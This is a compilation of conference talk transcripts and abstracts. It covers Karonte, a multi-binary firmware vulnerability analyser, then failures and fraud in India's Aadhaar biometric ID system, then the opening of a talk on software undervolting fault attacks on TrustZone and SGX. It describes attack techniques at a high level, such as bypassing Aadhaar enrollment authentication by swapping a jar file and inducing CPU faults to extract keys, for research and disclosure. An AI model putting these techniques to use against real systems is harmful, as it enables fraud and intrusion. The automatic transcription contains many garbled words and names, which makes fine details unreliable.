binaries. Also, we plot some statistics, and we found that 80% of the firmware were analyzed within a day, as you can see from the top left figure. However, experiments presented a great variance, which we found was due to implementation details. For instance, we found that anger would take more than seven hours to build some CFGs, and sometimes they were due to a high number of data keys. Also, we found that the number of paths, as you can see from the second picture from the top, the number of paths do not have any impact on the total time, and as you can see from the bottom, two pictures, performance not heavily affected by firmware size. Here we mean the number of binaries in a firmware sample and the total number of basic blocks. So let's see how to run Caronte. The procedure is pretty straightforward. So first, you get a firmware sample, you create a configuration file containing the information of the firmware sample, and then you run it. So let's see how. So this is an example of a configuration file. It contains few information, but most of them are optional. The only ones that are not are this one, the firmware path, that is the path to your firmware. And these two, the architecture of the firmware, and it is addressed if the firmware is a blob, is a firmware blob. All the other fields are optional, and you can set them if you have some information about the firmware. And the final explanation of all of these fields are on our GitHub repo. Once you set the configuration file, you can run Caronte. Now we provide a Docker container. You can find the link on our GitHub repo. And I'm going to run it, but it's not going to finish because it's going to take several hours. All we have to do is merely... Just run it on the configuration file, and it's going to do each step that we saw. Eventually, I'm going to stop it because it's going to take several hours anyway. Eventually, it will produce a result file that... around this yesterday, so you can see here. There is a lot going on here. I'm just going to go through some important information. So one thing that you can see is that... Oh, sorry. Is that these are the border binaries that Caronte found. Now, there might be some false positives. I'm not sure how many they are here, but as long as there are no false negatives or the number is very low, it's fine. It's good. In this case... Wait. Oh, I might have removed something. Oh, no, it's here. Perfect. In this case, this guy, HTTPD, is a true positive, which is the web server that we were talking before. Then we have the BDG. In this case, we can see that Caronte found that HTTPD communicates with two different binaries. Access.cgi and cjbin. Then we have information about the CPFs. For instance, here we can see that... Sorry. HTTPD. So we can see here that HTTPD has 28 data keys. And that the semantic CPF found 27 of them, and there might be one other here somewhere that I don't see. Anyway. Then we have a list of alerts. Now, thanks. Now, some alerts might be duplicates because of loops. So you can go ahead and inspect all of them manually, but I wrote an utility that you can use, which basically is going to filter out all the loops for you. Now I have to remember how I called it. This guy. Yeah. And here you can see that in total generated, the system generated, six, seven, eight alerts. So let's see one of them. I recently realized that the path that I'm reporting on the log, it's not the path from the setter binary to the getter binary to the sync, but it's only related to the getter binary up to the sync. I'm going to fix this in the next days and report the whole path. Anyway. So here we can see that the key content type contains the user input, and we have an espoused in an unsafe way to the sync address, a disk address. Now, and the binary in question is called file access CGI. So we can see what happens there. If you see here, we have a string copy that copies the content of haystack to destination. Haystack comes basically from this get amp. And if you see destination comes as parameter from this function and the 10 and this and this buffer, it says because 0x 68 bytes. And these turn out to be actually a two positive. Okay. So in summary, we presented a strategy to track data flow across different binaries. We evaluated our system on 952 firmware samples and some takeaways. Analyzing firmware is not easy and wouldn't be able to persist. We found out that firmware are made of interconnected components and static analysis can still be used to efficiently find vulnerabilities at scale. And finally, that communication is key for precision. This is a list of bibliography that I used throughout the presentation and I'm not the questions. So thank you, Nilo, for a very interesting talk. If you have questions, we have three microphones, one, two, and three. If you have a question, please go ahead to the microphone and we'll take your question. Yes, microphone number two. Do you rely on imports from Libc or something like that? Or do you have some issues with statically linked binaries, or is it all semantic analysis of a function? So, okay. We use anger. So for example, if you have an indirect call, we use anger to figure out what's the target. And to answer your question, like if you use Libc, some CPFs do. For instance, the environment CPF do and it checks if this attempt or get them function are called. But also we use a semantic CPF, which basically in cases where information are missing, like there is no such thing as Libc or some vendors reimplemented their own functions. We use this CPF to actually try to understand the semantic of the function and understand if it's, for example, a custom set up. Thanks. Microphone number three. In embedded environments, you often have also that the getter might work on a DMA, some kind of vendor drive on a DMA. Are you considering this? And second part of the question, how would you then distinguish this from your generic IPC? Because I can imagine that they look very similar in the actual code. So if I understand correctly your question, you mentioned a case of MMIO, where some data is retrieved directly from some address in memory. So what we found is that these addresses are usually hard coded somewhere. So the vendor knows that, for example, from this address A to this address B, it's some data from this peripheral. So when we find that some hard coded address, we think that this is some red from some interesting data. And this would be also distinguishable from your, so the CPF, the generic CPF, would be distinguishable from a DMA driver by using this fixed address, as you mean. Yeah, that's what the semantic CPF does among the other things. Thank you. Another question for microphone number three. What's the license for Caronte? Sorry? I checked the software license. I checked the git repository and there is no license text at all. That's a good question. I haven't thought about it yet. I will. Any more questions from here or from the internet? Okay, then a big round of applause to Nilo again. Great talk. Thank you.
Low-power, single-purpose embedded devices (e.g., routers and IoT devices) have become ubiquitous. While they automate and simplify many aspects of our lives, recent large-scale attacks have shown that their sheer number poses a severe threat to the Internet infrastructure, which led to the development of an IoT-specific cybercrime underground. Unfortunately, the software on these systems is hardware-dependent, and typically executes in unique, minimal environments with non-standard configurations, making security analysis particularly challenging. Moreover, most of the existing devices implement their functionality through the use of multiple binaries. This multi-binary service implementation renders current static and dynamic analysis techniques either ineffective or inefficient, as they are unable to identify and adequately model the communication between the various executables. In this talk, we will unveil the inner peculiarities of embedded firmware, we will show why existing firmware analysis techniques are ineffective, and we will present Karonte, a novel static analysis tool capable of analyzing embedded-device firmware by modeling and tracking multi-binary interactions. Our tool propagates taint information between binaries to detect insecure, attacker-controlled interactions, and effectively identify vulnerabilities. We will then present the results and insights of our experiments. We tested Karonte on 53 firmware samples from various vendors, showing that our prototype tool can successfully track and constrain multi-binary interactions. In doing so, we discovered 46 zero-day bugs, which we disclosed to the responsible entities. We performed a large-scale experiment on 899 different samples, showing that Karonte scales well with firmware samples of different size and complexity, and can effectively and efficiently analyze real-world firmware in a generic and fully automated fashion. Finally, we will demo our tool, showing how it led to the detection of a previously unknown vulnerability. Presentation Outline 1. Introduction to IoT/Embedded firmware [~7 min] * A brief intro to the IoT landscape and the problems caused by insecure IoT devices. * Overview of the peculiarities that characterize embedded firmware. * Strong dependence from custom, unique environments. * Firmware samples are composed of multiple binaries, in a file system fashion (e.g., SquashFS). * Example of how a typical firmware sample looks like. 2. How to Analyze Firmware? [~5 min] * Overview on the current approaches/tools to analyze modern firmware and spot security vulnerabilities. * Description of the limitations of the current tools. * Dynamic analysis is usually unfeasible, because of the different, customized environments where firmware samples run. * Traditional, single-binary static analysis generates too many false positives because it does not take into account the interactions between the multiple binaries in a firmware sample. 3. Modeling Multi-Binary Interactions [~5 min] * Binaries/processes communicate through a finite set of communication paradigms, known as Inter-Process Communication (or IPC) paradigms. * An instance of an IPC is identified through a unique key (which we term a data key) that is known by every process involved in the communication. * Data keys associated with common IPC paradigms can be used to statically track the flow of attacker-controlled information between binaries. 4. Karonte: Design & Architecture [~15 min] * Our tool, Karonte, performs inter-binary data-flow tracking to automatically detect insecure interactions among binaries of a firmware sample, ultimately discovering security vulnerabilities (memory-corruption and DoS vulnerabilities). We will go through the steps of our approach. * As a first step, Karonte unpacks the firmware image using the off-the-shelf firmware unpacking utility binwalk. * Then, it analyzes the unpacked firmware sample and automatically retrieves the set of binaries that export the device functionality to the outside world. These border binaries incorporate the logic necessary to accept user requests received from external sources (e.g., the network), and represent the point where attacker-controlled data is introduced within the firmware itself. * Given a set of border binaries, Karonte builds a Binary Dependency Graph (BDG) that models communications among those binaries processing attacker-controlled data. The BDG is iteratively recovered by leveraging a collection of Communication Paradigm Finder (CPF) modules, which are able to reason about the different inter-process communication paradigms. * We perform static symbolic taint analysis to track how the data is propagated through the binary and collect the constraints that are applied to such data. We then propagate the data with its constraints to the other binaries in the BDG. * Finally, Karonte identifies security issues caused by insecure attacker-controlled data flows. 5. Evaluation & Results [~10 min] * We leveraged a dataset of 53 modern firmware samples to study, in depth, each phase of our approach and evaluate its effectiveness to find bugs. * We will show that our approach successfully identifies data flows across different firmware components, correctly propagating taint information. * This allowed us to discover potentially vulnerable data flows, leading to the discovery of 46 zero-day software bugs, and the rediscovery of another 5 n-days bugs. * Karonte provided an alert reduction of two orders of magnitude and a low false-positive rate. * We performed a large-scale experiment on 899 different firmware samples to assess the scalability of our tool. We will show that Karonte scales well with firmware samples of different size and complexity, and thus can be used to analyze real-world firmware. 6. Demo of Karonte [~5 min] * We will show how Karonte analyzes a real-world firmware sample and detects a security vulnerability that we found in the wild. * We will show the output that Karonte produces and how analysts can leverage our tool to test IoT devices. 7. Conclusive Remarks [~3 min] * A reprise of the initial questions and summary of the takeaways.
10.5446/53141 (DOI)
The previous talk was overwhelmingly depressing and dealt with CIA illegally spying on people and Julian Assange being under constant surveillance and you think it cannot possibly be worse, but it can because our next speaker is going to tell you about systems for collection of biometric data and digital identities and how they can potentially make lives worse not just for dozens of people but for hundreds of millions of people or billions of people. So let's hear it for Kiran Jano Agadda. Yes unpacking the compromises of Adar and other digital identities inspired by it. Kiran is the founder of Karana Projects, an organization examined in identity programs. So he's going to tell us about the most depressing thing you're going to hear in this room today. Thank you. Thank you Kiran. Thanks everyone I'm glad to be here. So let's get started. Well as always these things start with an origin story. So in the beginning we did not have identity cards everybody knew you by your name or your way of face and then things got a little complicated and we got ID papers and before long this was a meme. Where are we? Okay come on. Technology doesn't like working and it doesn't want to work. Yes. So we are hackers. We like to think all problems can be solved by hacking and a decade ago in 2009 in India some of our kind looked at this ID paper problem and thought there has got to be a better way. I mean why do papers have a life of their own? What happens if we lose your papers? Do you not have identity anymore? What happens if your papers are confiscated? Does that change who you are as a person and how do we think of this in a better way? And so for inspiration you can go back to the voyager spacecraft. When the voyager spacecraft left earth for outer space it carried this image on it. Now this is the aliens edition of showing ID papers. Who are you? Humans. This is good for outer space then why can't we do something like this on earth? And so these people started asking why do you need to see my ID? You can see me. My body is my ID. So this is nice but bodies can't go online and so you need to know somehow extract the soul of your body and take it online and this is not an ideal reference. This is in fact how they think about it and this is the statement that they make explaining how they think about this that your soul your atma can be uploaded into the cloud and then exist online. And how do you do this? Well the approach that they took up was to say collect all your biometrics. They take your photograph, they take your fingerprints, all 10 fingers, they take two iris scans and they give you an agar which means foundation which is supposed to be the foundation of the rest of your life. This is quite literally now how you enter cyberspace in their vision. Now if they want so much data from you what more could they possibly want? And this is something that worried the judge of the Supreme Court of India who went on to ask see well are you going to do this next? At this point you're wondering is this satire or is this science fiction? Well nope the database of the built has 1.25 billion entries in it and this is how they announce that number with a Christmas greeting. So where do they keep this data? As computer programmers we often struggle to explain technical concepts to a non-technical kind of audience and this is sort of what happened in the Supreme Court of India when a case against Aadha was being heard last year. The Atonich general Mr. KK Vinogopal who was 87 years old at that time explained data storage to the justices of the Supreme Court explaining that it is stored behind in a complex that has walls that are 13 feet high and 5 feet thick therefore it is safe. So as you can expect the public phone is very funny and since then 13 foot wall is a meme in India. What are you doing? Well it's behind the 13 foot wall so nothing to worry about. But this isn't your word jokes. So we can go back to Arthuklok who made this statement you know that any sufficiently advanced technology is indistinguishable from magic. Your average person does not understand how technology works so to them technology is magic and this essentially then means that we hackers who understand technology are society's magicians. You got a magic wand, you wave it and problems are solved and this is how people think this is supposed to work but we know better. We actually know how technology works and we do not we know when technology does not work and it is imperative on us to call it out and that's what I'm here for today to explain to you why this technology does not work and what we need to be doing about it. So let's start off with the basics. What does Arthuklok actually collect? This is their rough database structure. They collect biometrics and they collect demographics. In the biometrics they classify them into two components the core biometrics which are your fingerprints and your iris scans are considered extremely confidential data and will never be shared that's the mandate that they offer but your photograph which is also biometric can be shared because it is after all what goes into an identity card. The other part is the demographics. They collect your name, your date of birth if it is known, a lot of people in India do not know when they were born, they are your gender, you can declare yourself as a transsexual that's accepted in the other system and then they collect a postal address and this information is what you submit when you enroll. Your biometrics are then sent for deduplication against the entire database so there are billion plus records in there. If you write enrol today they will compare your biometrics with every single record already in the database to confirm that it's not already enrolled. Now this is a process that takes roughly about 45 days so that's how long it takes for them to confirm that you are a new enroly and you now have another number that's guaranteed unique and anybody can apply. The only requirement is that you physically present in India. The law says you have to be there for 180 days but nobody checks so you can just walk into any other enrollment center sign up and you will have an ID. The number when it is assigned to you is sent to you by post. You do not get notified online and the letter that they give you it looks like this is essentially the way they confirm finally that your address is actually real because if this was your address you're supposed to receive the card and therefore your proof of address is confirmed. This as you can expect is a serious problem for migrant workers who cannot guarantee where they're going to be when the letter arrives but we'll get to that later. So the API set are available. There are three basic APIs. There is a demographic identification API which unfortunately mistakenly called an authentication API even though it's not. In what you do in this API is if you're calling the API you submit an other number and you submit a piece of demographic information like you say this other number and this name do they match and you get a yes or no answer. You do not get any information back or you can do this with a fingerprint authentication. You actually upload a scan fingerprint and another number and say do these things match and you get a yes or no or if you cannot take a fingerprint for whatever reason you can ask for a password to be sent to the phone number that's been registered and you get a six digit number give the number and the other number and say do they match and then you verify that somebody gave you the right one time password and therefore you authenticated into their account. All three of these APIs do not give you any information from the database except there's another one called the electronic know your customer database which is used for ID checks for institutions like banks where you do get the information back but we'll get into that again later. Now if you take just this minimalist API see very little data collection apart from biometrics very little demographic connection and nothing is ever written back outside of the KYC API. So on the basis of this minimalism the unique identification authority of India claims that it cannot be used for surveillance because it does not know anything. This is a public claim that they repeatedly make except for one little detail the other number itself is now a universal foreign key because that's what you use to authenticate with other into some other database and who runs those databases as it turns out it's a government again most of them are run by the government. So if you have a government that is really interested in surveillance and a department of the government runs an ID program which it claims cannot be used for surveillance what should the government do when it really wants to use it for surveillance but they make it mandatory for everything and that gets you a situation where Adar is officially voluntary but in practice mandatory which leads to the next meme in India Adar is voluntarily mandatory. So let's look at what is mandatory for it is mandatory to collect any welfare benefit it is mandatory if you want to pay tax or rather pay a file your tax returns I mean nobody will ever dare say we will not take your tax money. To file your tax return you need Adar if you do not earn enough to file taxes and you collect welfare you need Adar so that's like everybody's covered. To get a birth certificate for a newborn baby you need an Adar for the baby to get a death certificate for someone who's died you need an Adar number for the person who died if you want to get married well both parties have to provide an Adar number and at this point it's like what's left who is it optional for. Now the death certificate part is interesting how do you verify the Adar number of a dead person? You can't take the fingerprints I mean the dead can't consent apart from the fact that your technology will stop working once the body gets cold you can't send a one-time password to a dead person's mobile phone because that's indistinguishable from theft my phone has been stolen and somebody declared me dead I mean is it acceptable? So they in fact do not have any authentication for dead people someone's dead you can't get a death certificate without providing an Adar number and well they didn't sign up for Adar in their lifetime so what are you going to do now? You just submit any random number sometimes you submit your own number sometimes the coroner submits their number and so now what you get here is your first instance of a database that is supposed to be a biometrically secure and authenticated completely failing to do its purpose because this is a use case that was completely not considered okay and this is not unusual okay the apis I just described require a license that license is almost impossible to get so what do most people do? Well they just take an Adar number and put in the database they don't bother to take anything about it so part of what happens here is in the implementation of Adar there is this recurring confusion between three very different concepts identification authentication and authorization okay the fact that you can accept my ID and confirm its legitimate is not the same thing as confirming that I am the holder of their identification and it's not the same thing as me saying I'm okay with you doing something in my name these are three different things okay I'll give an example of where this can go massively wrong in 2017 the telecom regulator issued an order asking telecom companies to authenticate all of their customers to make sure that they were no SIM cards issued to people that they do not know who they were issued to so they forced an exercise across the country asking telecom operators to go find their customers and get them to authenticate with Adar okay telecom companies have become so big in India that they're turning into banks and so this happened with one of them and after this exercise a lot of people started complaining that they were not receiving welfare benefits anymore I mean you authenticated your phone connection and your welfare stopped what happened so this this turned into a bit of a scandal and eventually we discovered what had happened all of them had opened new bank accounts that they did not know existed and the welfare money was going to the new bank account okay here is how much the external fraud was and this is just one telecom operator the telecom operator had obtained a banking license and they were desperate for customers so when you went to authenticate your phone connection they used that authentication as authorization to open a bank account and reroute your subsidy money and you would not even have been aware of that okay and so this scam essentially stole 1.9 billion rupees from 310,000 individuals for one telecom operator alone I think the number is wrong it's not 310,000 it's 3.1 million I'm sorry I'm off by 1 0 so how do you make a mistake this fundamental in your design and for this you have to go back to the what attorney general said you know the same day that he said that it's protected by a 13 foot wall he also went on to explain what the whole point of Adar was and as you can see the assumption made in Adar is that the individual is fraudulent unless they prove that they are not that is the fundamental design assumption of Adar so what it has essentially done is that it's very carefully replaced your rights as a citizen with privileges granted by the state for good behavior and that should have been a violation of the constitution it takes people a while to realize that this is a very subtle change that they made that you were entitled to welfare under the constitution of India and it was the state's responsibility to give it to you if you deserved it but what they did was flip it around and say you have to be the person who proves your legitimacy to receive what is actually due to be you okay and then you have a term for this they call it the self-cleaning database this is a reference I found in a book the first time I found an explanation of how they thought about this so essentially for the state to hold you up your rights requires considerable resources on the part of the state and if the state's running a budget deficit well they're not going to deliver on your rights as they're supposed to and this is the fundamental problem of most developing economies that you may have rights but the state doesn't know to give it to you because they're lacking the capacity so what Adar does to solve the problem is to say well if the state can't do its thing you must do it as a citizen this is your duty as a citizen now to behave like a good citizen and show to the state that you are keeping your data clean this is not a wayward reference while this is an author in a book pointing this out in fact this is how the state explains this in the parliament of India the other system has a mechanism of self-cleaning the data during course of time so what happens when you aren't with people like this if you insist that to collect your subsidies to collect your rations which is food that your rationed food if you want to collect it you must authenticate biometrically and the technology does not work for whatever reason your fingerprints don't scan there is no cell phone connection something else has gone wrong what do you do well it goes to bizarre extents this is a new story where a remote village in India did not have a good mobile connection but somebody discovered that the top of the tree there was an internet connection and so they put a fingerprint scanner on the tree and now you climb up and put your finger there and only then you're given food this is one example but obviously there are lots of these so what happens if we can't do this this is a dive this is a compilation of reports of how many people have died because the technology failed these numbers have been growing fortunately last year the supreme court insisted that if the technology doesn't work it is not the citizen's fault and you must provide an alternative and I don't know what the current numbers are I don't expect they're much better than this it's probably as dismal as it is because the state really has no interest in in upholding rights so ironically enough the database design has no feature for reporting a death their official FAQ says somebody related to has died how do you report it and they say well we don't know how to record a death so just ignore it so what happens to dead people you know we had we start off with this talk of how your soul your asthma is uploaded into the cloud as it turns out now you become a ghost in the system and you continue to exist as a fictional entity in a database because they do not know how to record that you have died this URL has a list of possibilities and problems that arise out of the fact that they do not record a death okay so why are they doing all these things okay and the logical purpose you know what is it supposed to do it's supposed to fix a corruption problem in welfare distribution by ensuring subsidies are not misrouted and delivered to someone who did not deserve a subsidy so the way they do this and this is an employee manual from 2014 this is the next track and the basic idea that is part of the training for government employees is that you must record an ad hoc number for every person in your database so if you got like a hundred million welfare delas welfare recipients you are required to collect a hundred million ad hoc numbers how do you do this one you can go door to door and collect everybody's numbers yeah or you can do what's called an inorganic seeding and they use the term seeding to describe the act of collecting ad hoc numbers so they have what's called an organic seeding where the beneficiary comes to you and says here's my ad hoc number and then they have the inorganic seeding where you take it without their consent okay it's in the manual so they also claim this is foolproof because beneficiaries who are claiming benefits in the names of others such persons will not be able to authenticate themselves after all it you're supposed to do a biometric authentication before you take their name in the database but when you're doing it inorganically you're not doing a biometric authentication and so what happens there is they also point out that it is possible for the government employee to get it wrong and they just you know possibility of life so essentially thumbs up to the state thumbs down to the citizen that's a design okay and of course bullying a person to comply is not the same thing as technology that actually works and fraud exists as a violation of technology itself here's a case where another number was issued to a god okay and the letter was printed it was dispatched and the postman had to return it saying I do not know where to deliver this so how does this happen as it turns out the hackers who built this who are so proud of their biometric deduplication completely forgot about document verification and you can put a real person's fingerprints and upload a picture of a god or a dog or whatever else there have been other numbers issued to cows to trees to gods and nobody checks those documents you can be anybody you feel like you can also get around it but not submitting a biometrics because well there are people who don't have fingers or who don't have eyes or whose eyes one scan and what you do about them so in your technical design you offer a biometric exception all it requires is an enrollment agent who's willing to accept that you have an exception and must feed in the system how many cases of fraud have happened using the exception route nobody knows okay out of the 1.25 billion enrollments that they claim how many of these are fraudulent nobody knows because nobody checks these documents you can get a document in the name of the god if you like now it gets even more bizarre so this is from a news report and this news report very conveniently publish the other number itself which is a 12 digit number up on top okay other numbers are supposed to be confidential like they are like credit card numbers you know if you have the number you can claim to given welfare to someone so you do not publish your number in public so this went out in the press and someone else built on this and got himself a gas connection with subsidies so lord hanuman the god has an other number and also buys cooking gas from the state so this one I could just go on and on with these stories like any manner of fraud you want it's in the system it's been exploited and the ultimate price obviously is if you can steal biometrics itself and that too has happened so this is a case in the state of uter pradesh where the police found a gang trading in stolen biometrics okay there's a little bit of side story over there you know where at the top they refer to them as a gang and then below they become hackers okay and this shift in usage is not innocent they use gang to refer to low intelligence thugs who are operating on the street and then they use the word hackers to refer to people doing a higher level act in this case this part became an extremely interesting story for us to investigate because we discovered how bad the enrollment software itself was when you enroll the enrollment agent is required to first authenticate themselves and then accept an authentication on behalf of the individual who's trying to get enrolled and the enrollment agent's id is used to ensure there is a quality check so you know if there's fraud you know who was the source of the fraud it turns out that the enrollment client is built in java and it's a bunch of jar files and the authentication module is a jar file if you do not want to authenticate you replace the jar file with something else that offers the same api but does not authenticate and that's it you enroll that's the quality of the software so when you bring these issues up with the uid a this is what they do they are the ministry of gunyal every single time you report a story like this and say we have discovered a data breach you've discovered a vulnerability we have discovered something going on well they say well the data that we have in our database is safe is your copy that's stolen yeah it's effectively this the cidr is the central identities repository and the cidr remains safe and secure nobody has managed to break in nobody can use your other number without authentication official response every single time you report a problem like this yeah it's gotten so bad that the former boss of uid a is a man named ram sevak sharma who's currently the chairman of the telecom regulatory authority issued a public challenge saying hack me i guarantee you you cannot now this is incitement to a criminal act yeah it is also a violation of the law to publish your own other number but he's the boss he does it nobody says anything to him you know and it's a statement of his privilege more than anything else so he went on to promise that he will not take action against anyone who hacks him but how the hell does a private citizen offer you immunity against a criminal act so obviously nobody took him on and he went on to declare victory and all we could do was make cartoons yes we did this literally was the only way to respond to a provocation like that so once again you have to stop and ask how is it possible for such utter incompetence to come out of a democracy i mean democracy is supposed to have checks and balances that prevent this kind of thing from happening how did this happen and one way to understand it is maybe other was never about welfare at all maybe it was never about giving people identity maybe it was always about the state wanting to make it convenient to identify people and once you look at the timeline of adhah where did this project come from how did how did you create a project that goes on to enroll a billion people i mean it can't happen just because people voluntarily came and said i love it i'm signing up yeah it had to be forced on them what forces them to do it so the larger timeline is this completely apart from where this came from and it goes back to 1999 there was a year when india went to war with pakistan over a conflict in a region called kargil in the state of jamun kashmir and what the government of india figured is some people from pakistan came into india passed off as indian citizens and caused this to happen and so you can't let this happen you can't let this happen you can't have non-indians wandering around the streets of india how are you going to stop them well so the government's solution was well we're just going to integrate every single resident of this country and find out if they're indian or not so they called this project the national population register it was meant to be a database of every single citizen of india this is after the 1999 incident not recently and then they had a second project called the national registry of citizens where you take the npr data and go back and integrate everyone and say are you indian or not okay with all 1.2 or 1.3 billion people and then they lost elections so 2004 they lose elections the project basically doesn't move forward and the new government appoints a technocrat who gives it a new marketing spin saying look this is not about surveillance at all this is about welfare and we're going to make people's lives better and he goes on to create a fairly fantastic media profile to the point where the economist does pr for him you saw what goes wrong with other everything that goes wrong and this is the economist last week essentially saying africa should import this from india it's economist you can look it up so you have one pr campaign running like this about how it's all for welfare and you have the government that sponsored this pr campaign who went on to lose elections again and the party that originally created a surveillance database in 1999 is back in power now since 2014 and they're back on the original agenda and so this month they passed what's called the citizenship amendment act which provides a path to citizenship of india if you are from pakistan bangladesh or afghanistan and you're not a muslim that's the condition the bill explicitly excludes muslims from citizenship of india now this is very clearly a violation of the constitution of india in fact article 14 which is the shirt i'm wearing here this is my protest shirt essentially says that the state shall not deny equality before the law or equal access to the law to anybody in the jurisdiction of india it is not restricted to citizens it is applicable to all persons and the act that has just been passed is a violation of the constitution now we have a majority in government they can do what they please because there is literally no opposition to stop them which leaves it up to the people and as a result of this they have been protest all over india for the last month sample of news reports they have been millions of people on the streets of india of walking around asking for protest most people have not figured out that this is actually based on adar because adar is the marketing term for the project that is meant to survey and separate the people of india into citizens and non-citizens based on their religion so this is very dense this is from protest yesterday morning thank you Kiran we have some time for questions so please line up behind the microphones and we also have signal angels who will pass on the questions from the internet and we're going to take one right now where are any data leaks when the guy posted his number on twitter well there have been multiple data leaks uh i'll point you to a fairly interesting one the chairman of the ui di mr nandan lekin thought so little about data leaks that he published his adar number online many years ago and after subsequently being told that maybe this is not the best idea for you as a chairman of the entity to leak your own number he finally deleted it but the internet never forgets and you can find this on stack overflow today so you just go to stack overflow search for nandan lekin he will find his adar number consequences of leaks yes in fact the estimate of the total number of adar numbers that are leaked in public is well past 200 million thank you microphone number two please yeah first of all thanks for the talk i think that um civil registry and and public databases or public service databases of uh of citizens um are definitely a topic that we should discuss here more um the problem with this one is is very very obvious uh but but i'd like just to mention that many of the privileges that that we as a community uh being grown up in a western uh let's say um stable democracy we derive from having a birth certificate and being able to get an identity even if it's just one in paper and there is a question coming right yeah so i would i would like to ask one one thing yes why don't they use the paper that is being sent out as sort of an identification thing like like we have with our id cards for a simple reason that um they really believe in this vision and they do not want people using paper cards yeah but also in terms of um was this the first ID because you know india doesn't have comprehensive birth registration um the ui da answered this question under the right to information act which is like the equivalent of the us freedom of information access and in 2015 they explained how many times how many enrollments happened against other documents versus the person not having any documents at all and the person taste level was 99.5 percent had at least two documents proving their id okay so this idea that it gave id to people who do not have one is completely false as per their own admission thank you microphone number one uh do you generally oppose um the idea of a central identification number or just the implementation by a flailing state like india that's a slightly lower question yes so the state always makes a huge difference you know the quality of the institutions of a state make a huge difference i was in fact having a discussion with someone here yesterday who pointed out that distrust in centralized id seems to be a common wealth phenomenon yeah the uk doesn't have one the us doesn't have one but germany seems to have one um and most civil law jurisdictions seem to be okay with the idea of centralized id as long as it's well regulated so yes so the nature of government makes a huge difference and i would say i can't speak of the technology of whether it's being good or bad separate from whether the governance of it is good or bad thank you microphone number two hi karen thanks a lot for the talk um if i'm not wrong a few months ago maybe a year ago i read about this um big democracy event going on in india um now there is a few countries that are considering using id for elections to avoid fraud and all the sort of things and i come from a country that has been trying really hard to implement an id system that is reliable and it helps to combat fraud in elections do you think this id system can be somehow reformed to make the whole democracy process easier in india we have a case study of this fortunately so i don't know to speak from theory so in india we had a state called andhra padish which split into two separate states so now they're called andhra position talangana and part of what happens when you split a state is that now you have separate elections for each state and so you need to know who the voters of your state will now be in the new state you know previously you had one voter database for your entire state now you have two separate voter databases and you need to know which person is in which state so for the process of separating the database they went ahead and collected other numbers and ended up deleting a significant fraction of the voter database because they couldn't prove that they were residents of the state okay asam is a different story so the andhra position talangana story is particularly illustrative of how if you think you can bring in a technological solution you probably are going to make it worse in fact you're guaranteed going to make it worse thank you kiran jono agada a round of applause you
Aadhaar is India's national biometric identity database, with over one billion records comprising fingerprints, iris scans and basic demographic information. It is presented as identity technology, allowing an individual to identify themselves, but also as an identification technology, allowing the state to see an individual, identify fraudulent welfare beneficiaries, and thus realise savings. These claims are not complementary. They are in fact contradictory, compromising each other. If one must be true, the other must somehow be false, and this is the reality of Aadhaar. This talk will demonstrate how Aadhaar's attempt to be a cure for all kinds of ailments has in fact resulted in large scale exclusion and fraud. We will look at a series of design assumptions in Aadhaar's architecture, the gaps in them, and then examples of how these gaps were exploited, from public news reports. Aadhaar is often touted as a revolutionary technology that has simultaneously given identity to billions and realised substantial savings from fraud for the government. These utopian visions are finding buyers around the world. Jamaica, Morocco and Kenya have all adopted projects inspired by Aadhaar, and more countries are following suit. Unfortunately, Aadhaar is not magic, and there is now an urgent need for a sober understanding to be taken worldwide. The Kaarana project began in 2017 as a collaboration between programmers and lawyers, to document architectural assumptions and their impact on human rights. The project's findings were presented as evidence to the Supreme Court of India in 2018, and are acknowledged in a scathing dissent by Justice Chandrachud (September 2018). This dissent was in turn cited by the Supreme Court of Jamaica to shut down a biometric identity program in that country (April 2019). In September 2019, Kaarana member Anand Venkatanarayanan also appeared as a witness in the Supreme Court of Kenya in a petition against Huduma Namba, the Kenyan biometric identity program. We hope that this presentation at CCC will help public interest technologists from around the world prepare for a critical examination of similar programs in their countries.
10.5446/53143 (DOI)
Welcome to our next talk. It's called Flipping Bits from Software Without Rohammer. The more reminder Rohammer uses is a software-based fault attack. It was published in 2015. There were countermeasures developed and we are still deploying these everywhere. Now our two speakers are going to talk about a new software-based fault attack to execute the problems inside the SGX environment. Our speakers are Professor Daniel Gruß from the University of Graz and Kit Murrick, Researching at the University of Birmingham. The content of this talk is actually in her first published paper published at IEEE, accepted at IEEE Security and Privacy next year. In case you do not come from the academic world, if this is your first paper, please welcome both a few round of applause and enjoy the talk. Hello. Let's get started. This is my favourite recent attack. It's called Clock Screw. The reason it's my favourite is it created a new class of fault attacks. Fault attacks? I know that. Fault attacks. You take these oscilloscopes and check the voltage line and then you drop the voltage first. Now, you see this is why this one is cool because you don't need any equipment at all. Adrian Tang, he created this wonderful attack that uses DVFS. What's that? Don't violate format specifications. I asked my boyfriend this morning what he thought DVFS did for and he said Darth Vader fights Skywalker. I'm also wearing his T-shirt especially for him as well. Maybe this is more technical. Maybe Dazzling Vault for security like SGX? No, it's not that either. The one I came up this morning was a drink vodka feel silly. It's not that either. It stands for dynamic voltage and frequency scaling. What that means is changing the voltage and the frequency of your CPU. Why do you want to do this? Why would anyone want to do this? Well, gamers want fast computers. I'm sure there are a few people out here who will want a really fast computer. These servers want high assurance and low running costs. What do you do if your hardware gets hot? You're going to need to modify them. Finding a voltage and frequency that work together is pretty difficult. What the manufacturers have done to make this easier is they've created a way to do this from software. They created memory mapped registers. You modify this from software and it has an impact on the hardware. That's what this wonderful clock screw attack did. They found something else out which is you may have heard of trust zone. Trust zone is an enclave in ARM chips that should be able to protect your data. If you can modify the frequency and voltage of the whole core, then you can modify it for both trust zone and normal code. This was their attack. In software, they modified the frequency to make it outside of the normal operating range and they induced faults. In an ARM chip, running on a mobile phone, they managed to get out an AES key from within trust zone. They should not be able to do that. They were able to trick trust zone into loading a self-signed app. You should not be able to do that. That made this ARM attack really interesting. This year, another attack came out called Vault Jockey. This also attacked ARM chips. Instead of looking at frequency on ARM chips, they were looking at voltage on ARM chips. They were thinking, what about Intel? Okay, so Intel, actually I know something about Intel because I had this nice laptop from HP. I really liked it, but it had this problem that was going too hot all the time. I couldn't even work without shutting it down all the time because of the heat problem. What I did was I undervolted the CPU. Actually this worked for me for several years. I used this undervolted for several years. You can also see this. I just took this from somewhere on the Internet and they compared with undervolting and without undervolting. You can see that the benchmark score improves by undervolting because you don't run into the thermal throttling that often. There are different tools to do that. On Windows you could use RM clock. There's also throttle stop. On Linux there's the Linux Intel undervolt GitHub repository. There's one more actually, Adrian Tang, who I don't know if you know I'm a bit of a fan. He was the lead author on Clock Screw. He wrote his PhD thesis. In the appendix he talked about undervolting on Intel machines and how you do it. I wish I'd read that before 